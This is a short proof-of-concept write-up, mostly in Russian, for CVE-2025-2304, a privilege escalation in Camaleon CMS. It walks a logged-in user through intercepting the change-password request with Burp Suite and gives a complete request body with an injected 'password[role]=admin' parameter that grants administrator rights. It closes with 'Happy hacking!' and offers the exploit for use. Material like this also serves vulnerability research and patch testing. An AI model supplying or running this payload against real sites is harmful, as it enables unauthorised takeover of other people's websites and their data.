
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
CVE-2025-2304 POC - Эскалация привилегий Camaleon CMS
Данный POC используется для повышения привилегий в Camaleon CMS до уровня администратора. Эксплойт работает путём внедрения роли в функцию сброса пароля аутентифицированного пользователя.
Начните с входа в свою учётную запись. После входа перейдите на страницу профиля и нажмите «Изменить пароль». Захватите функцию изменения пароля с помощью Burp Suite.
Используя приведённый ниже пример, отредактируйте полезную нагрузку, добавив роль.
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin
Добавив %5Brole%5D=admin в полезную нагрузку, вы получите права администратора.
Обновите страницу, и теперь вы администратор.
Удачного взлома!